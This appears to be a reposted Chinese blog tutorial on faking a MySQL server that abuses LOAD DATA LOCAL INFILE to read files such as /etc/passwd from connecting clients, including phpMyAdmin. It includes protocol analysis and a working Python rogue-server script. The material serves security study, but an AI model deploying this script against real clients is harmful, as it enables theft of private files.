mysql服务端怎么实现_伪造mysql服务端实现任意读取

最新推荐文章于 2021-02-08 09:56:50 发布
最新推荐文章于 2021-02-08 09:56:50 发布
阅读量107 收藏
点赞数
文章标签: mysql服务端怎么实现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35600369/article/details/113335468
版权

偶然看到大佬的一篇文章,讲利用mysql的LOAD DATA INFILE的功能读取客户端文件,觉得这个思路十分有趣,于是跟着大佬的思路复现了一遍。

0x01 LOAD DATA INFILE

LOAD DATA INFILE是我十分陌生的一种用法,作用是可以把文件读入到数据库的某个表里,如果在远程连接状态下使用了LOCAL关键字,即LOAD DATE LOCAL INFILE,那么就会从客户端读取一个本地文件,存入服务器端的table里。

eb84438a3d07b3e3b5944edf85c92dbc.png

查看mysql官方文档,官方已经指出这种方法存在着两种潜在的问题:

ce5ec82c8236244af99c83e9814d62c6.png

一种是指不安全的服务端,可以伪造请求去读取客户端的任意文件。

另一种是指webserver的环境下(比如熟悉的phpmyadmin),客户端其实也就是服务端,通过load data local读入的就是服务端自己的文件,同样会造成任意文件读取。

比如在phpmyadmin里执行:

load data local infile "/etc/passwd" into TABLE test;

select * from test;

就可以直接读取任意文件了。

0x02 对mysql的抓包分析

首先先要关闭ssl,在客户端的配置文件的[mysql]节添加skip_ssl,或者关闭服务端的ssl支持。

之后在client端连接server端,进行了登陆,并执行了一次load data infil的操作,数据包如下。

af1fcddc4023ea2cf2e9ae7848f0dff7.png

前面先是一个greeting,是服务端向客户諯发送的握手初始化包:

7bd4f585fda93989d54f0d9901c30abf.png

之后,客户端会发回一个登陆验证包:

29466dcf0137a5cc0ccdfbc5aef0842a.png

服务端发回一个验证成功的应答:

6f5b19751f1c638dba08be3939fd4f4c.png

后面客户端会做一个初始化的查询:

544aa006959d72b1bdbcebae8b778439.png

服务端的应答:

b9f51d81f8111ac0dff307075257cd88.png

这里客户端和服务端就已经成功连接上了,接下来客户端请求load data infile。(如果无法使用LOAD DATA INFILE语法的话,考虑在连接 MySQL 的时候加上--enable-local-infile选项,或者设置local_infile全局变量为ON)

8d24b34befdf060adc9f2956d11bf807.png

接下来服务端会发回一个文件确认:

e8ca779c88ec2c8645280da159b63712.png

然后客户端就把本地文件发过来了:

5f6e912296b576eb44daec82544077cd.png

0x03 漏洞原理

load data的过程大概可以总结为:

客户端:hi,现在我把我的/etc/passwd文件插入test表格里

服务端:好的,把/etc/passwd文件发过来吧

客户端:好的,这是我的/etc/passwd文件

根据官方文档,客户端读取哪个文件是由服务端决定的,也就是说服务端发回哪个文件名,客户端就会读取哪个文件。

而对于这个请求,mysql并没有强制限制必须先由客户端发起load data,一个伪造的服务端可以在任何时候回复一个 file-transfer 请求,比如说最开始客户端请求初始化查询的时候。

这时的过程大概是:

客户端:hi,现在我要查询一下版本信息

服务端:好的,把/etc/passwd文件发过来吧

客户端:好的,这是我的/etc/passwd文件

0x04 服务端伪造

主要的步骤就是在本地3306端口开启一个socket,接收到连接请求后,按照顺序发送greeting,认证成功和读取文件要求。

这里我没有去分析数据包的内容,直接使用提取wireshark抓到的包。

python版:

#coding=utf-8

importsocket

importlogging

logging.basicConfig(level=logging.DEBUG)

filename="/etc/passwd"sv=socket.socket()

sv.bind(("",3306))

sv.listen(5)

conn,address=sv.accept()

logging.info(‘Conn from: %r‘, address)

conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")

conn.recv(9999)

logging.info("auth okay")

conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")

conn.recv(9999)

logging.info("want file...")

wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filename

conn.sendall(wantfile)

content=conn.recv(9999)

logging.info(content)

conn.close()

效果:

c0d9262bc1631f5235fae08d61378759.png

由于我们直接发送认证成功,所以客户端用户名密码可以随便写。

在phpMyAdmin里开启远程连接(将phpMyAdmin/libraries/config.default.php的$cfg[‘AllowArbitraryServer‘]改为true):

b84c48c9f7501870526d1025bcd536ae.png

成功:

c26a3c11a798bbf3282ec7690825b8ec.png

这是大佬写的一个php版(同样在本地和phpmyadmin里都成功):

2b65ef29a5872cc0e4771c25889edd04.gifView Code

ps:

这里有个要注意的地方:

40f1e59619166278dd54e58dff0f1fd6.png

按照大佬的说法,Capabilities这两个字节,\xf7 则表示不支持 SSL,如果不这么写会因为ssl的问题无法连接。

0x05 参考

https://blog.csdn.net/ASzhiwei/article/details/81914381

http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

https://dev.mysql.com/doc/refman/8.0/en/load-data-local.html

https://www.freebuf.com/vuls/188910.html

https://lightless.me/archives/read-mysql-client-file.html

原文:https://www.cnblogs.com/apossin/p/10127496.html

朱凤仙
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql协议包伪造_伪造mysql-server实现任意读取
weixin_35174422的博客
01-19 285
大概就类比于下面的对话:客户:我想将/etc/passwd插入user表中服务:那把/etc/passwd发给我客户:巴拉巴拉我们所需要的做的就是搭建一个mysql服务,然后完成上述过程,实现客户任意文件读取。LOAD DATA INFILE问题出在该语法上,该语法用于读取一个文件放入表中。两种用法如下:load data infile "/data/data.csv" into ta...
伪造mysql服务
tomyyyyy
08-23 278
伪造mysql服务 原理概述 MySQL客户服务通信过程中是通过对话的形式来实现的,客户发送一个操作请求,然后服务根据客服发送的请求来响应客户,在这个过程中客户如果一个操作需要两步才能完成那么当它发送完第一个请求过后并不会存储这个请求,而是直接就丢掉了,所以第二步就是根据服务的响应来继续进行,这里服务就可以欺骗客户做一些事情。 但是一般的通信都是客服发送一个MySQL语...
伪造mysql服务实现任意读取
dhyi38680的博客
12-16 189
  偶然看到大佬的一篇文章,讲利用mysql的LOAD DATA INFILE的功能读取客户文件,觉得这个思路十分有趣,于是跟着大佬的思路复现了一遍。 0x01LOAD DATA INFILE   LOAD DATA INFILE是我十分陌生的一种用法,作用是可以把文件读入到数据库的某个表里,如果在远程连接状态下使用了LOCAL关键字,即LOAD DATE LOCAL INFIL...
mysql协议包伪造_伪造mysql服务实现任意读取
weixin_35749786的博客
01-19 95
偶然看到大佬的一篇文章,讲利用mysql的LOAD DATA INFILE的功能读取客户文件,觉得这个思路十分有趣,于是跟着大佬的思路复现了一遍。0x01LOAD DATA INFILELOAD DATA INFILE是我十分陌生的一种用法,作用是可以把文件读入到数据库的某个表里,如果在远程连接状态下使用了LOCAL关键字,即LOAD DATE LOCAL INFILE,那么就会从客户读取一...
伪造mysql服务实现任意文件下载漏洞
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
10-25 1498
文章目录环境准备安装wireshark安装mysql漏洞分析利用思路原理构造 环境准备 这个问题主要是出在LOAD DATA INFILE这个语法上,这个语法主要是用于读取一个文件的内容并且放到一个表中。通常有两种用法,分别是: load data infile “/etc/passwd” into table TestTable; load data local infile “/etc/passwd” into table TestTable; 有时候也会与FIELDS TERMINATED BY '\
网站的PHP实现技术-精品创业书模板.rar
09-17
9. RESTful API设计:随着移动应用和API驱动的开发模式兴起,PHP也能用于创建RESTful API,实现前后分离,让多个客户能够灵活调用服务数据。 10. 持续集成与部署:了解如何配置版本控制系统(如Git),实现...
基于springboot+netty+mybatis+hbase+kafka实现的socket server+源代码+文档说明
最新发布
11-28
- [ ] socket client接受到请求数据的命令后,从mysql读取假数据,伪造成真实设备传输的数据格式,并发送给socket server - [ ] socket server接收到返回的数据后,分别写入到hbase数据库和kafka队列中 - [ ] 最后...
java_news
03-13
在Java领域,这类系统通常采用Web开发框架如Spring Boot、Struts或Play Framework,结合数据库管理系统(如MySQL、Oracle或MongoDB)来存储和检索新闻数据。本系统的核心功能包括新闻创建、编辑、分类、搜索以及用户...
CRUD-Inventario:该Web服务由解决方案集成技术EE团队2实施
04-17
可能还包括JWT(JSON Web Tokens)来实现状态管理,以及跨站请求伪造(CSRF)和跨站脚本(XSS)防护。 性能优化可能涉及缓存策略,比如使用Redis存储经常访问的数据,减少数据库查询。日志记录和监控工具,如...
天达在线
02-20
PHP通常与MySQL、PostgreSQL等数据库管理系统配合,进行数据的CRUD(创建、读取、更新、删除)操作。 3. **模板引擎**:为了分离业务逻辑和视图展示,项目可能使用了如Smarty或Twig等PHP模板引擎,使前和后代码...
MysqlT:伪造Myslq服务,并利用Mysql逻辑漏洞来获取客户任意文件反击攻击者
05-04
MysqlT 404StarLink 2.0 - Galaxy MysqlT 是 404Team 中的一环,如果对MysqlT有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。 伪造Myslq服务,并利用Mysql逻辑漏洞来获取客户任意文件反击攻击者 当你需要将本地文件上传到服务器时,没有合适的上传器时,也可以使用本软件,小巧玲珑 该程序利用了Mysql客户LoadData的逻辑漏洞 与其它软件不同,本软件支持大文件无损传输 支持用户验证 支持自定义Mysql版本 随机的Salt加密,加上用户验证,让攻击者毫无察觉 Net文件夹是.NET程序只能运行在Windows NetCore文件夹是.NET CORE程序可以运行在 Windows,Linux,MAC 使用教程: 首次使用请在程序中输入Mysql Help,来查看帮助命令 你可以在程序根目录中的User.data文
mysql 动态生成测试数据
09-11
mysql 动态生成测试数据的语句,方便测试数据。
mysql客户攻击_GitHub - ywscr/MysqlT: 伪造Myslq服务,并利用Mysql逻辑漏洞来获取客户任意文件反击攻击者...
weixin_32842805的博客
02-02 117
MysqlT伪造Myslq服务,并利用Mysql逻辑漏洞来获取客户任意文件反击攻击者当你需要将本地文件上传到服务器时,没有合适的上传器时,也可以使用本软件,小巧玲珑该程序利用了Mysql客户LoadData的逻辑漏洞与其它软件不同,本软件支持大文件无损传输支持用户验证支持自定义Mysql版本随机的Salt加密,加上用户验证,让攻击者毫无察觉Net文件夹是.NET程序只能运行在Windows...
mysql抓包sql_伪造mysql服务实现任意文件下载漏洞
weixin_29230649的博客
02-08 182
这个问题主要是出在LOAD DATA INFILE这个语法上,这个语法主要是用于读取一个文件的内容并且放到一个表中。通常有两种用法,分别是:load data infile "/etc/passwd" into table TestTable;load data local infile "/etc/passwd" into table TestTable;有时候也会与FIELDS TERMINA...
客户伪造代理服务器ip进行sql注入
free361的博客
12-16 2743
前几天同事发现网站访问异常慢,经过排查,发现mysql亚历山大。果断查看日志,发现大量这样的查看 # Query_time: 5.019276  Lock_time: 0.000066 Rows_sent: 0  Rows_examined: 1 SET timestamp=1477759063; update wa_search_record SET keyword_length= '
html读取本地txt_利用MySQL/MariaDB的逻辑缺陷伪造恶意服务读取客户文件
weixin_39996478的博客
11-28 95
为了方便某些场景的使用,MySQL提供了LOAD DATA LOCAL INFILE语句,允许从客户导入文件数据到服务器中。然而,由于此功能的实现逻辑存在一定缺陷,可能会造成服务能在未经客户允许的情况下读取客户的文件内容。首先,我们来分析一下正常使用此功能时,客户服务的流量交互过程。这里笔者采用的PHPStudy搭建的MySQL环境。首先,开启正常的MySQL服务。在“F:...
伪装成mysql的备_如何伪装成一个服务开发(六) -- 数据库操作
weixin_35744893的博客
01-26 214
目录如何伪装成一个服务开发(六)前言本篇开始学习Spring 的数据库连接。术语数据库连接涉及到一些术语,如果在学习之前没有搞清楚,很容易在业务理解上出现偏差。JDBC :Java DataBase Connectivity ,java数据库连接。 他实际上是一套api标准。数据源: 是指存储数据的地方,比如mysql oracle ,还有一些内存数据库,比如h2JPA : java持久层ap...
基于ssm+mysql记账管理系统设计与实现.docx
07-19
"基于SSM+MySQL的记账管理系统是一个结合了Java的Spring、SpringMVC和MyBatis(简称SSM)框架以及MySQL数据库的Web应用程序,旨在实现高效的线上记账管理。此系统适用于小型企事业单位,帮助它们将内部的记账工作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值